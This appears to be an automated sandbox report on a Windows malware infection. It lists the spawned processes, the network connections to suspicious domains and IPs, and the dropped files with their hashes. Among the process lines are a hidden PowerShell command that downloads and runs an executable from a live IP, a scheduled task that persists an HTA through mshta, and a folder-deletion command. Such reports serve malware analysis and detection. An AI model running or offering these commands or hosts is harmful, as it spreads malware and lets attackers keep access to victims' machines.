"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef6849778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "6fLQXma4qrZ" /tr "mshta \"C:\Temp\My6dz0IVO.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1868 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2088 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\My6dz0IVO.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2452 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3516 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {ED4AE890-6A52-4F3B-8F30-ACF88E571A55} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]

C:\ProgramData\omlnpw\uxek.exe

C:\ProgramData\omlnpw\uxek.exe

C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ym7yu" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe"

C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe

"C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe"

C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 68

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
GB 216.58.213.10:443 ogads-pa.googleapis.com tcp
GB 216.58.213.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 play.google.com udp
FI 65.109.226.203:443 65.109.226.203 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
FI 65.109.226.203:443 65.109.226.203 tcp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
DE 104.194.157.122:80 104.194.157.122 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 172.67.198.28:443 pirtyoffensiz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
FI 65.109.226.203:443 65.109.226.203 tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
DE 93.186.202.3:4000 towerbingobongoboom.com tcp
US 104.21.94.161:443 advertised.life tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 172.67.198.28:443 pirtyoffensiz.bet tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 8.8.8.8:53 importenptoc.com udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 voicesharped.com udp
US 8.8.8.8:53 inputrreparnt.com udp
US 8.8.8.8:53 torpdidebar.com udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 rebeldettern.com udp
US 8.8.8.8:53 actiothreaz.com udp
US 8.8.8.8:53 garulouscuto.com udp
US 8.8.8.8:53 breedertremnd.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 outlinedtrai.bet udp
US 172.67.218.33:443 outlinedtrai.bet tcp

Files

memory/2348-0-0x0000000000220000-0x00000000006F0000-memory.dmp

memory/2348-1-0x0000000077BA0000-0x0000000077BA2000-memory.dmp

memory/2348-2-0x0000000000221000-0x0000000000289000-memory.dmp

memory/2348-3-0x0000000000220000-0x00000000006F0000-memory.dmp

memory/2348-4-0x0000000000220000-0x00000000006F0000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 a3ec4b44e7677c12a76bf51f45480133
SHA1 15587b7a0420115e979461490689a79beca64118
SHA256 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
SHA512 4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075

memory/2680-20-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2348-18-0x0000000006FF0000-0x00000000074C0000-memory.dmp

memory/2348-21-0x0000000000221000-0x0000000000289000-memory.dmp

memory/2348-17-0x0000000000220000-0x00000000006F0000-memory.dmp

memory/2680-22-0x0000000000FE1000-0x0000000001049000-memory.dmp

memory/2680-23-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-25-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-26-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-27-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-29-0x0000000000FE1000-0x0000000001049000-memory.dmp

memory/2680-28-0x0000000000FE0000-0x00000000014B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

MD5 515748a93ce7beb3f4416ec66ba8488e
SHA1 3ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256 a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA512 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

MD5 896dc9ae02a4b0cf429b4346a3990fae
SHA1 17f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA256 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
SHA512 e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c

memory/1452-59-0x0000000000EE0000-0x0000000000F90000-memory.dmp

memory/1748-75-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-73-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-72-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1748-70-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-68-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-66-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-64-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-62-0x0000000000400000-0x000000000045F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

MD5 87da0483aefde76a5086c5b2ea14304f
SHA1 ae6b27aeaf487666c71b26397709004e65b09002
SHA256 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512 ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4

memory/2680-90-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2876-94-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2680-93-0x0000000006710000-0x0000000006B7A000-memory.dmp

memory/1472-102-0x000000013F730000-0x000000013FBEB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCB0.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarD20.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0dadbeb6cb656c1adadb2015c5727321
SHA1 7bdb83d1c1dbbe875804d6ec90d87fc205638c16
SHA256 323066e5228b20f9be99a08a9d14695423f8b12198ef49ff4bd537988e98c9ce
SHA512 067cf6d24c40d0775e11c3fc0d9e8819d6dc63f92362fbbd82ec4dc25f38b92f2891da5c3811931821ae4937f4df290f16e4f1b3dd37145b75e6d2e9d4dfac41

C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe

MD5 5b0bf9144e2661027c1621957b1ef278
SHA1 589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256 a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512 e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177

C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta

MD5 ae563590dd5b65fb84045428b3c11628
SHA1 5690c743b714148b4017ea721dad61b654976dce
SHA256 0ef0e06906218a3cbe624c964e5fd67bf277e3d3ee6cf291af5db22ceada9d88
SHA512 2186ad4b4bbc1f9180139d38f9d89369561e7bc867359d424a0984ac7683ce86ab30d5dfd2697f6249988b102358e769f41e275bb8b1917d845a4e5b7294827a

C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/1452-277-0x0000000001270000-0x00000000016C2000-memory.dmp

memory/2680-276-0x0000000006710000-0x0000000006B7A000-memory.dmp

memory/2876-274-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1672-273-0x0000000006440000-0x0000000006892000-memory.dmp

memory/1672-272-0x0000000006440000-0x0000000006892000-memory.dmp

memory/1452-296-0x0000000001270000-0x00000000016C2000-memory.dmp

memory/1452-297-0x0000000001270000-0x00000000016C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 9b007a287efa6b3a81140630ab982f57
SHA1 5d25771df48e4f684da495be34f9f4397cc1b262
SHA256 6003b304cea7770b10db506f07194eacfa3a0a794df79bc42af91cacca68c02c
SHA512 3e97c17b2661d1b9476bb0b195e6773c68f13564e952f6758cbf8078160fdf31b0d8ea04f8465ad4c8475819e6f50a054178d07ce2d18482c8422a232511ded8

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Temp\My6dz0IVO.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

memory/2876-389-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2680-388-0x0000000000FE0000-0x00000000014B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

MD5 41e7a544f14c8eeda7675b6f8fc2f267
SHA1 98585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256 b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA512 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef

memory/2680-412-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/1368-415-0x0000000000DC0000-0x00000000010EE000-memory.dmp

memory/2680-413-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/1452-433-0x0000000001270000-0x00000000016C2000-memory.dmp

memory/1368-432-0x0000000000DC0000-0x00000000010EE000-memory.dmp

memory/1368-431-0x0000000006DF0000-0x000000000711E000-memory.dmp

memory/1228-437-0x0000000000EB0000-0x00000000011DE000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/1652-477-0x0000000006660000-0x0000000006980000-memory.dmp

memory/2680-479-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/3124-478-0x0000000000E00000-0x0000000001120000-memory.dmp

\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 d433e1dc943e6ea29d67cf72d2f6fecd
SHA1 9964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256 a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512 caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

memory/1652-476-0x0000000006660000-0x0000000006980000-memory.dmp

memory/3124-501-0x0000000000E00000-0x0000000001120000-memory.dmp

memory/2680-524-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/1452-537-0x0000000001270000-0x00000000016C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

MD5 49a690607e1d76e6970b724c4fd22ec7
SHA1 4b670fc77c181e9afb3986729ee3b585bc460c3f
SHA256 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7
SHA512 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b

memory/2680-584-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/1228-586-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/3780-589-0x00000000013C0000-0x00000000016BF000-memory.dmp

memory/2680-588-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-587-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/2876-611-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 bd6a9d5ffd2bad77a792a14ab8f2775f
SHA1 9494a453e67cce126bbad031b33325e17deaf374
SHA256 f610afd2849e89b2b04d2bdca5b33211be65081e94a5207cc51e4e0cb1c0d498
SHA512 6cd104bf357c61374dde38dce2664a8101b051a9ba47379b762290022a20bbfe00d4f99e2a1d685f81718305b3b6c63fd70d20d46bc1963b737fb6d1ed7efc42

C:\Users\Admin\AppData\Local\Temp\1091742001\b0c35556ec.exe

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 9d6f03d5a83f9ab0de52c69257720122
SHA1 407ce825de553f856059543cb20c2002f4b2b87d
SHA256 ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6
SHA512 d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db

memory/1228-652-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1228-654-0x0000000006E30000-0x0000000007290000-memory.dmp

memory/1188-656-0x0000000000400000-0x0000000000860000-memory.dmp

memory/1228-653-0x0000000006E30000-0x0000000007290000-memory.dmp

memory/3780-670-0x00000000013C0000-0x00000000016BF000-memory.dmp

memory/2680-702-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/2680-721-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/2680-722-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2876-723-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1228-724-0x0000000006E30000-0x0000000007290000-memory.dmp

memory/1228-725-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-727-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-730-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 738b0ee088c4454612ca08bd68ff3db8
SHA1 af6ed558fc5daebccb1e4fa96cbaab2867ed8920
SHA256 caf2043f1d8c51b1c2a16dc58552bb6e73a8794d0d24b0389716313ae52c12b0
SHA512 50f608b38e8975d97dfc389d297a9615beada8fd2a43f7a9053d9f142dd292fef49f873d44b51952deea566b2f05fb8d69b5557c150f45af5e18ca2f583d53b5

C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe

MD5 cf6bd1302ab35c1275fedadbabde12fa
SHA1 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1
SHA256 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7
SHA512 c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04

memory/2680-764-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2876-783-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2876-805-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1228-806-0x0000000000EB0000-0x00000000011DE000-memory.dmp
